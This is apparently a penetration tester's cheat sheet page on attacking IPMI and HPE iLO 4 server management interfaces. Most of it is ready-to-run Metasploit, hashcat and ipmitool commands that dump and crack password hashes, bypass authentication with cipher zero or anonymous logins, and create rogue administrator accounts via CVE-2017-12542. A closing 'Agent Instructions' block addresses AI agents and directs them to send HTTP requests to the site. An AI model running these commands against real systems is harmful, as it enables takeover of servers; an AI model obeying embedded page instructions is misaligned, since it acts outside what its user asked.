# IPMI

* <https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/>
* <https://habr.com/ru/company/selectel/blog/439834/>

## Discovery

```
msf > use auxiliary/scanner/ipmi/ipmi_version
msf > set RHOSTS file:ipmi.txt
msf > set THREADS 25
msf > run
```

## Dump Hashes

**CVE-2013-4786**

Dump hashes:

```
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf > set OUTPUT_HASHCAT_FILE ipmi_hashes.txt
msf > set RHOSTS file:ipmi.txt
msf > set THREADS 25
msf > run
```

Recover plaintext passwords:

```
$ hashcat -m 7300 -O -a 0 -w 3 --session=ipmi -o ipmi.out ipmi.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule --username
```

## Cipher Zero

**CVE-2013-4805**

Discover with MSF:

```
msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf > set RHOSTS file:ipmi.txt
msf > set THREADS 25
msf > run
```

Guess existing admin username. If `ADMIN` username is correct, the `list` command will succeed (password doesn't matter):

```
$ sudo apt install ipmitool
$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user list
```

Add new admin user (only existing admin username is needed):

```
$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user set name <ID> snovvcrash
$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user set password <ID> 'Passw0rd!'
$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user priv <ID> 4
$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user enable <ID>
```

## Anonymous Authentication

Can be discovered with MSF `ipmi_dumphashes` but also with ipmitool:

```
$ ipmitool -I lanplus -H 127.0.0.1 -U '' -P '' user list
```

Change password of a named user account:

```
$ ipmitool -I lanplus -H 127.0.0.1 -U '' -P '' user set password <ID> 'Passw0rd!'
```

## HPE iLO 4

* <https://codeby.net/threads/poluchaem-dostup-k-hp-ilo.63224/>
* <https://github.com/airbus-seclab/ilo4_toolbox>

### Add Admin User

**CVE-2017-12542**

Exploit with Python:

* <https://www.exploit-db.com/exploits/44005>

```
$ ./44005.py -t -e -u snovvcrash -p 'Passw0rd!' 127.0.0.1
```

Exploit with MSF:

```
msf > use auxiliary/admin/hp/hp_ilo_create_admin_account
msf > set RHOSTS 10.10.13.37
msf > set USERNAME snovvcrash
msf > run
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ppn.snovvcra.sh/pentest/infrastructure/ipmi.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.